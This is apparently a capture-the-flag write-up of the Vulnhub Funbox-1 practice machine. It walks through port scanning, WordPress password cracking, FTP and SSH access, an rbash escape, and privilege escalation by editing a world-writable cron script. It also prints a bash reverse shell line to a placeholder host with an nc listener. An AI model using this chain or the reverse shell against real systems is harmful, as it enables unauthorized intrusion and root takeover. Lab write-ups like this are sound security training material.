Vulnhub: Funbox-1

The Funbox series from Vulnhub is a great series for beginners. It has all the classic boot2root services.

Looking back, I really didn’t explain my steps here at all, yikes!

Scanning

crazyeights@es-base:~$ nmap -PS 192.168.56.1-255

Nmap scan report for 192.168.56.116
Host is up (0.00020s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

More Focused Scanning
crazyeights@es-base:~$ nmap -A -p- 192.168.56.116
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-08 20:06 EDT
Nmap scan report for 192.168.56.116
Host is up (0.0014s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     ProFTPD
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/secret/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://funbox.fritz.box/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|_    HY000
1 service unrecognized despite returning data.

[SNIP]

Web:

If you go to IP in your browser you are redirected to: http://funbox.fritz.box/

Add funbox.fritz.box to your hosts file:

crazyeights@es-base:~$ sudo vim /etc/hosts

#CTF
192.168.56.116 funbox.fritz.box

Refresh the page and you get a wordpress:

Image

Using wpscan to enumerate users:

crazyeights@es-base:~$ wpscan --url http://funbox.fritz.box -e u

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://funbox.fritz.box/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] joe
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Cracking user passwords:

crazyeights@es-base:~$ wpscan --url http://funbox.fritz.box --passwords lists/rockyou-40.txt --usernames joe,admin

[!] Valid Combinations Found:
 | Username: joe, Password: 12345
 | Username: admin, Password: iubire

With a valid login, we can login and replace a theme template php file with a php reverse shell.

Going to themes:

Location of 404.php: ` http://funbox.fritz.box/wp-content/themes/twentyseventeen/404.php `

Tried to put a reverse shell in 404.php gives you an error

FTP:

Login as joe using the credentials found for wordpress: joe:12345

crazyeights@es-base:~$ ftp funbox.fritz.box
Connected to funbox.fritz.box.
220 ProFTPD Server (Debian) [::ffff:192.168.56.116]
Name (funbox.fritz.box:crazyeights): joe
331 Password required for joe
Password:
230 User joe logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-------   1 joe      joe           998 Jul 18 09:49 mbox

Download the file mbox:

ftp> get mbox
local: mbox remote: mbox
200 PORT command successful
150 Opening BINARY mode data connection for mbox (998 bytes)
226 Transfer complete
998 bytes received in 0.01 secs (66.7952 kB/s)
ftp> 

The file mbox contains:

From root@funbox  Fri Jun 19 13:12:38 2020
Return-Path: <root@funbox>
X-Original-To: joe@funbox
Delivered-To: joe@funbox
Received: by funbox.fritz.box (Postfix, from userid 0)
	id 2D257446B0; Fri, 19 Jun 2020 13:12:38 +0000 (UTC)
Subject: Backups
To: <joe@funbox>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <20200619131238.2D257446B0@funbox.fritz.box>
Date: Fri, 19 Jun 2020 13:12:38 +0000 (UTC)
From: root <root@funbox>

Hi Joe, please tell funny the backupscript is done.

From root@funbox  Fri Jun 19 13:15:21 2020
Return-Path: <root@funbox>
X-Original-To: joe@funbox
Delivered-To: joe@funbox
Received: by funbox.fritz.box (Postfix, from userid 0)
	id 8E2D4446B0; Fri, 19 Jun 2020 13:15:21 +0000 (UTC)
Subject: Backups
To: <joe@funbox>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <20200619131521.8E2D4446B0@funbox.fritz.box>
Date: Fri, 19 Jun 2020 13:15:21 +0000 (UTC)
From: root <root@funbox>

Joe, WTF!?!?!?!?!?! Change your password right now! 12345 is an recommendation to fire you.

trying to log in as joe with password 12345

SSH:

crazyeights@es-base:~$ ssh joe@funbox.fritz.box

Joe is stuck in rbash:

joe@funbox:~$ cd /var/www/html
-rbash: cd: restricted

Breaking out of rbash:

That was easy. You can breakout by calling bash interactively:

joe@funbox:~$ bash -i
joe@funbox:~$ cd /var/www/html
joe@funbox:/var/www/html$ 

Snooping around:

joe@funbox:/var/www/html$ cd /home
joe@funbox:/home$ ls
funny  joe
joe@funbox:/home$ cd funny/
joe@funbox:/home/funny$ ls
html.tar
joe@funbox:/home/funny$ file html.tar
html.tar: POSIX tar archive (GNU)
joe@funbox:/home/funny$ tar -xvf html.tar
var/www/html/
tar: var: Cannot mkdir: Permission denied
tar: var/www/html: Cannot mkdir: No such file or directory
var/www/html/index.php
tar: var: Cannot mkdir: Permission denied
tar: var/www/html/index.php: Cannot open: No such file or directory
var/www/html/wp-cron.php

Checking if joe can run anything with elevated privileges:

joe@funbox:/home/funny$ sudo -l
[sudo] password for joe: 
Sorry, user joe may not run sudo on funbox.
joe@funbox:/home/funny$ find / -perm /4000 2>/dev/null
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/at
/usr/bin/chfn
/usr/bin/fusermount
/usr/bin/newgrp
[SNIP]

Checking mysql for credentials:

joe@funbox:/var/www/html$ mysql -u wordpress -p'wordpress'

The user funny is a admin/root user:

mysql> select * from wp_users;
-+---------------------+-----------------------------------------------+-------------+-----
|  1 | admin      | $P$BGUPID16QexYI9XRblG9k8rnr0TMJN1 | admin         | funny@funbox.box |   

Checking joe’s mail:

joe@funbox:/var/www/html$ mail
"/var/mail/joe": 2 messages 2 new
>N   1 funny              Fri Jun 19 14:31  13/501   Reminder
 N   2 funny              Fri Jun 19 14:32  13/501   Reminder
? 
Return-Path: <funny@funbox>
X-Original-To: joe@funbox
Delivered-To: joe@funbox
Received: by funbox.fritz.box (Postfix, from userid 1000)
	id A7979446B3; Fri, 19 Jun 2020 14:31:26 +0000 (UTC)
Subject: Reminder
To: <joe@funbox>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <20200619143126.A7979446B3@funbox.fritz.box>
Date: Fri, 19 Jun 2020 14:31:26 +0000 (UTC)
From: funny <funny@funbox>

Hi Joe, the hidden backup.sh backups the entire webspace on and on. Ted, the new admin, test it in a long run.

Finding the backup script

joe@funbox:/home/funny$ ls -lai
total 47608
533886 drwxr-xr-x 3 funny funny     4096 Jul 18 10:02 .
524290 drwxr-xr-x 4 root  root      4096 Jun 19 11:50 ..
536659 -rwxrwxrwx 1 funny funny       55 Jul 18 10:15 .backup.sh
[SNIP]

This script may be run as cronjob

joe@funbox:/home/funny$ cat .backup.sh 
#!/bin/bash
tar -cf /home/funny/html.tar /var/www/html

Another file in the dir:

joe@funbox:/home/funny$ cat .reminder.sh 
#!/bin/bash
echo "Hi Joe, the hidden backup.sh backups the entire webspace on and on. Ted, the new admin, test it in a long run." | mail -s"Reminder" joe@funbox
  • The script is being run every minute

  • It took me a long time to release this because the time is wrong.

joe@funbox:/home/funny$ stat html.tar 
  File: html.tar
  Size: 48701440  	Blocks: 95120      IO Block: 4096   regular file
Device: 802h/2050d	Inode: 533571      Links: 1
Access: (0664/-rw-rw-r--)  Uid: ( 1000/   funny)   Gid: ( 1000/   funny)
Access: 2020-10-09 00:34:45.831977679 +0000
Modify: 2020-10-09 00:58:01.619961040 +0000
Change: 2020-10-09 00:58:01.619961040 +0000
 Birth: -
joe@funbox:/home/funny$ date
Fri 09 Oct 2020 12:58:25 AM UTC

Getting the root flag:

Because I am lazy:

#!/bin/bash
tar -cf /home/funny/html.tar /var/www/html
cp /root/flag.txt /home/flag.txt

You are supposed to put a reverse shell, and start another listener to connect to it:

# ie. in backup:
/bin/bash -i >& /dev/tcp/AAA.BBB.CC.DD/1234 0>&1

# On your machine
nc -lvp 1234

Retrieving the root flag:

joe@funbox:/home/funny$ cd /home
joe@funbox:/home$ ls
flag.txt  funny  joe
joe@funbox:/home$ cat flag.txt 
Great ! You did it...
FUNBOX - made by @0815R2d2

FIN.